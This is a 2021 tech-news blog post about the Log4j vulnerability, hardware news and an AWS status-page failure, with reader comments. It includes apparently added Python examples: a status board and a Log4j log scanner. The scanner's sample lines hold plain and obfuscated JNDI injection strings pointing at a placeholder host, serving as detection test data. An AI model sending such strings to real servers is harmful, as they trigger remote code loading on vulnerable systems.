Sunday, December 12


Daily News Stuff 12 December 2021

RCE On Mars Edition

Top Story

  • A massive vulnerability in Log4j, a Java logging library buried inside enterprise software everywhere, caused utter panic at pretty much every major company in the world.  One commenter mentioned being in a Slack channel with three thousand other engineers all working frantically to patch systems.

    How much was the team of developers working to maintain this library being paid?

    If you guessed absolutely nothing you'd be very close.

    This is obviously unsustainable.  Trillion-dollar companies depend on this software and don't even think about contributing towards its upkeep.

    Open source software is supposed to be open.  It's not supposed to be free, because nothing is free.  If you're not paying for it up front, you'll be paying for it later on by diverting every engineer in your entire organisation for two days while other critical issues go ignored.

  • We're from the government.  We're here to help.  (CISA)

    The statement from CISA Director Jen Easterly on the Log4j vulnerability reads blah blah blah blah blah you should probably patch that blah blah blah.  Thanks Jen.

    The director of the US Cybersecurity and Infrastructure Security Agency has an MA in politics, philosophy, and economics from Oxford, which qualifies her for the job almost as much as you might think.

Tech News

  • What went wrong?

    Some idiots demanded that a logging library perform magic for them - specifically, that it evaluate lookup expressions, including JNDI lookups that fetch remote objects, embedded in the very strings it was asked to log.  (Crawshaw)

    And once the magic was put in place, it couldn't be removed because that would break critical software.

    And there wasn't anyone to take the necessary time to push back, deprecate the feature, and eventually remove it, because they weren't getting paid.

  • Cloudflare reports on the vulnerability and their response.  (Cloudflare)

    One important point is that they firewall all their servers for both inbound and outbound connections - default deny in both directions.  If a server gets compromised but is blocked by default from talking to anything else, the damage is contained.

    With this particular exploit the vulnerable server had to dial out to an attacker-controlled server to fetch the payload, and if that outbound connection was blocked, nothing happened.  The server got handed a bottle of poison pills but couldn't get the damn child-proof cap off.  (Egress filtering is a mitigation, not a fix: if outbound DNS is still permitted, the same lookup string can leak data in DNS queries, so you still have to patch.)
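    As an added example (not from the post or from Cloudflare's write-up), here is a small Python scanner that approaches the same problem from the detection side: rather than containing the outbound fetch, it looks for the lookup strings that trigger it in access-log lines.  Attackers obfuscated the `${jndi:...}` trigger using Log4j's own nested lookups (`${lower:j}`, `${::-j}`, `${env:NOPE:-j}` and the like), so the scanner first collapses those forms and then checks for a `jndi:` lookup.  The log lines are constructed, the addresses are documentation-range placeholders, and the normaliser handles only the common obfuscation forms, not the full Log4j lookup grammar.

```python
import re

# Constructed sample log lines (not real traffic). Lines 0-3 carry probe
# strings in request headers in plain and obfuscated forms; line 4 is benign
# and contains an unrelated ${...} placeholder that must not trip the scanner.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - "GET / HTTP/1.1" 200 "User-Agent: ${jndi:ldap://203.0.113.7:1389/a}"',
    '10.0.0.6 - - "GET / HTTP/1.1" 200 "User-Agent: ${${lower:j}ndi:rmi://203.0.113.7/x}"',
    '10.0.0.7 - - "GET / HTTP/1.1" 200 "X-Api-Version: ${${::-j}${::-n}${::-d}${::-i}:dns://203.0.113.7/x}"',
    '10.0.0.8 - - "GET / HTTP/1.1" 200 "User-Agent: ${${env:NOPE:-j}ndi:ldaps://203.0.113.7/x}"',
    '10.0.0.9 - - "GET /price?amount=${total} HTTP/1.1" 200 "User-Agent: curl/7.79"',
]

# A ${...} that contains no further ${...}: the innermost lookup.
_INNERMOST = re.compile(r"\$\{([^${}]*)\}")
# Log4j default-value syntax ${lookup:key:-default}; attackers rely on the
# lookup failing so that the default (a single letter) is substituted.
_DEFAULT_VALUE = re.compile(r"^[A-Za-z]*:[^:]*:-(.*)$", re.DOTALL)
# The trigger itself, once obfuscation has been stripped. The captured group
# is the JNDI scheme (ldap, ldaps, rmi, dns, ...). Lookup prefixes are
# matched case-insensitively, as Log4j itself lower-cases them.
_JNDI = re.compile(r"\$\{\s*jndi:\s*([^:}\s]*)", re.IGNORECASE)


def _resolve(match: re.Match) -> str:
    """Collapse one innermost lookup if it is a known obfuscation form.

    Unknown lookups are returned unchanged so that a real ${jndi:...}
    survives normalisation and can be detected afterwards.
    """
    body = match.group(1)
    lowered = body.lower()
    if lowered.startswith("lower:"):
        return body[len("lower:"):].lower()
    if lowered.startswith("upper:"):
        return body[len("upper:"):].upper()
    default = _DEFAULT_VALUE.match(body)
    if default:
        return default.group(1)
    return match.group(0)


def normalize_lookups(text: str, max_rounds: int = 20) -> str:
    """Repeatedly collapse obfuscating lookups from the inside out.

    max_rounds bounds the work on pathological input; each round resolves
    every currently-innermost lookup that matches a known form.
    """
    for _ in range(max_rounds):
        collapsed = _INNERMOST.sub(_resolve, text)
        if collapsed == text:
            break
        text = collapsed
    return text


def find_jndi_lookups(text: str) -> list[str]:
    """Return the (lower-cased) JNDI schemes of every trigger in the text."""
    return [m.group(1).lower() for m in _JNDI.finditer(normalize_lookups(text))]


def scan_log_lines(lines) -> list[tuple[int, str]]:
    """Scan log lines; return (line index, jndi scheme) for every hit."""
    hits = []
    for index, line in enumerate(lines):
        for scheme in find_jndi_lookups(line):
            hits.append((index, scheme))
    return hits


if __name__ == "__main__":
    for index, scheme in scan_log_lines(SAMPLE_LOG_LINES):
        print(f"line {index}: jndi lookup via {scheme}: {SAMPLE_LOG_LINES[index]}")
```

    This is a triage heuristic, not a reimplementation of Log4j's lookup engine; it tells you which hosts were being probed and with what scheme, which is exactly the outbound traffic the egress rules above would have to block.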

  • Future AMD GPUs could use stacked dies for cache memory and AI accelerators.  (WCCFTech)

    Maybe not the 2022 lineup, but this is likely to happen soon, for reasons.

  • The reasons being that Moore's Law is ending - again - in 2028.  (LessWrong)

    At the 1.5nm node (which doesn't measure 1.5nm in any dimension but never mind that) planar scaling will likely stop.

    What will happen instead - and the linked article goes into all the details you could possibly want - is that chips will go 3D.  Flash storage already has, and it was a revolution.  Cell phone chips already stack memory on top of the processor.  AMD is stacking cache on top of server CPUs, and Intel is wedging stacks of RAM into their supercomputer CPUs.

    One of the side effects of this is that chips will get cheaper.  Fabs - chip factories - are massively expensive, and only remain at the leading edge of technology for a couple of years.  If they lasted for twenty years instead of two - and the machines to make the machines for the fabs also lasted twenty years instead of two - prices would come down drastically.

  • I want to see default RED.  (Reddit)

    While Amazon's systems were down all over the place - not just in US-East-1 but also in US-West-2, where the one critical Amazon-based service I look after runs - their public monitoring systems were reporting everything was fine, because the outage prevented the monitoring page from updating.

    Monitoring systems should autonomously go red if they can't update.  A status page that can't refresh its data should fail closed and show red, not keep displaying the last green it happened to see.
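    As an added example, not from the post and not Amazon's code, here is what that rule looks like in Python: a status board that treats "no fresh heartbeat" as RED instead of displaying whatever it last heard.  The region names, timestamps and the five-minute staleness window are constructed for the example.

```python
from dataclasses import dataclass
from datetime import datetime, timedelta, timezone

GREEN, RED = "GREEN", "RED"


@dataclass(frozen=True)
class Heartbeat:
    status: str    # what the monitor reported, e.g. GREEN
    at: datetime   # when that report was produced (timezone-aware)


class StatusBoard:
    """A public status board that fails closed.

    A region is shown RED unless a heartbeat newer than max_age says
    otherwise; silence, staleness and never-seen regions all render RED.
    """

    def __init__(self, regions, max_age: timedelta):
        self.max_age = max_age
        self._last = {region: None for region in regions}

    def record(self, region: str, status: str, at: datetime) -> None:
        """Store a heartbeat, ignoring late or out-of-order reports."""
        if region not in self._last:
            raise KeyError(f"unknown region {region!r}")
        if at.tzinfo is None:
            raise ValueError("heartbeat timestamps must be timezone-aware")
        previous = self._last[region]
        if previous is None or at > previous.at:
            self._last[region] = Heartbeat(status, at)

    def display(self, region: str, now: datetime) -> tuple[str, str]:
        """Return (colour, reason) for one region as of `now`."""
        heartbeat = self._last[region]
        if heartbeat is None:
            return RED, "no heartbeat received"
        age = now - heartbeat.at
        if age > self.max_age:
            return RED, f"stale: last heartbeat {age} ago"
        return heartbeat.status, f"fresh: last heartbeat {age} ago"

    def render(self, now: datetime) -> dict[str, tuple[str, str]]:
        return {region: self.display(region, now) for region in self._last}


def demo() -> dict[str, tuple[str, str]]:
    """Constructed scenario: one region stopped reporting 45 minutes ago,
    one is healthy, one has never reported at all."""
    now = datetime(2021, 12, 7, 17, 0, tzinfo=timezone.utc)  # arbitrary
    board = StatusBoard(["us-east-1", "us-west-2", "eu-west-1"],
                        max_age=timedelta(minutes=5))
    board.record("us-east-1", GREEN, now - timedelta(minutes=45))
    board.record("us-west-2", GREEN, now - timedelta(minutes=2))
    # A late-arriving older report for us-west-2 must not roll the clock back.
    board.record("us-west-2", GREEN, now - timedelta(minutes=30))
    return board.render(now)


if __name__ == "__main__":
    for region, (colour, reason) in demo().items():
        print(f"{region:10s} {colour:6s} {reason}")
```

    The check only helps if it runs somewhere the outage can't reach; a staleness test hosted on the same infrastructure it reports on just fails to render the RED along with everything else.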

  • Intel's new X710-T4L is a massive upgrade.  (Serve the Home)

    It's a quad 10Gbase-T card that uses a maximum of 14.2W with all ports running at full speed.  The previous model peaked at 28.9W.

    In fact, this model running at 10Gb uses less power than the previous model running at 1Gb.  That's a huge improvement because a core delaying factor in the rollout of 10Gb Ethernet has been the power requirements for running it over cheap twisted-pair cable.  (It uses less power over specialised cables or fiber, but the pricing is absurd.)

    The new card, at $500, is also $100 cheaper than the old one.

    It's also out of stock everywhere because everything is.

  • Except the QSW-M2108-2C which does seem to be available albeit in short supply.  (QNAP)

    I wanted a 2.5Gb / 10Gb managed switch for my lab buildout, but had planned to settle for an unmanaged model because I couldn't find one that wasn't insanely expensive.  This is just what I wanted - 8 x 2.5Gb ports, 2 x 10Gb ports with both RJ45 and SFP+ connectors, and fairly solid management features including link aggregation and VLANs.

    Part of the function of the software lab I'm building is to simulate real-world faults, and being able to mess with the network under software control is a key part of that.

    They also have a 16-port model, but that's more than I need, twice as expensive, and out of stock.

  • Managed 1Gb switches are a dime a dozen.  Well, not quite, but you can get them starting at around $35, a tenth the price of the cheapest managed 2.5Gb switches.

  • A new FDA-approved eye drop causes red eyes and headaches.  (CBS News)

    Well, what the hell does it treat then?

    It treats reading glasses.

    If you're between 40 and 65 years old and need reading glasses (but not specifically prescription glasses) these eye drops can alleviate that need for six to ten hours.

    Since I do need prescription glasses (I have three pairs for distance, computers, and reading, plus a couple of spares) these won't do anything for me, but if you just need plain cheap reading glasses they could do the trick.

  • Apple found a benchmark where the 2021 M1 Max MacBook Pro is faster than the 2019 Intel Mac.  (WCCFTech)

    Linus Tech Tips tested the M1 Max and found that while it did excel on one test, most of the time it was slower than an Intel-based notebook with an RTX 3050 - at about one third the price.

    That might change as they improve the drivers and software optimisation but right now it's a very expensive toy.

    I'll likely be getting a MacBook Air or an iMac to do Mac and iOS software testing for work, but I'll be getting the cheapest model I can get away with.

Party Like It's 1979 Video of the Day

Disclaimer: Lights in the mirror may be bluer than they appear.

Posted by: Pixy Misa at 05:27 PM

1 Mu/MeeNu Overlord, It appears barbarians of the spamming variety have begun a small skirmish in The Pond. Probably need to put that down quick.

Posted by: Will at Monday, December 13 2021 12:30 AM (8548M)

2 Have you looked at progressive lenses for your glasses?  They replace the need for three pairs of glasses by splitting the lens into near, close and far zones, and you quickly learn to look at things by tilting your head.  Good for the convenience of replacing three pairs of glasses with one pair, but bad for price, as progressive lenses are quite expensive.

Posted by: David at Monday, December 13 2021 02:19 AM (kOkn4)

3 Is that new eye drug called Retinax?

Posted by: Rick C at Monday, December 13 2021 02:42 AM (Z0GF0)

4 I picked up an i5-12600K yesterday, and a new motherboard to go with it (ASUS ROG STRIX Z690-I SUPER DUPER ULTRA DDR4, I think the name was).  Got one of the few DDR4 mobos because I already had 32GB of that lying around.  Mini ITX board with 4 SATA and 2 M.2.  The latter are on a daughterboard, and that was a minor problem because the heat sink impinged on the heat pipes for the cooler I got.  Fortunately, the way the board works is the M.2 on the underside connects to the CPU and the one on top connects via the SB, so I obviously only used the bottom one, and left the top heatsink off.  It also came with a 2.5GB NIC and wifi 6.  Pretty nice board.
Then I held my nose and upgraded to Windows 11.  Overall the difference is meh but there are a few annoyances, including "why the hell is 'right-click on taskbar to get Task Manager' missing?!"

Posted by: Rick C at Monday, December 13 2021 02:48 AM (Z0GF0)

5 Outlandos d'Amour is 1978, silly.  Must give us stuff from Reggatta de Blanc, c'mon!
"Bring On The Night"

Posted by: normal at Monday, December 13 2021 11:05 AM (obo9H)

6 Going by date charted rather than date recorded for this list.

Posted by: Pixy Misa at Monday, December 13 2021 03:31 PM (PiXy!)


